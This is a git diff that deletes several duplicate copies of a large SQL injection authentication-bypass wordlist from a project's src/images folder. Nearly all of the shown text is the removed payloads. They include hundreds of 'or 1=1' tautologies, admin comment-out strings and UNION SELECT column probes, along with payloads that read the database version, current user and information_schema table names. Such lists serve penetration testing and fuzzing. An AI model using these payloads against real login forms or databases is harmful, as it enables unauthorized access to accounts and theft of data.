-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
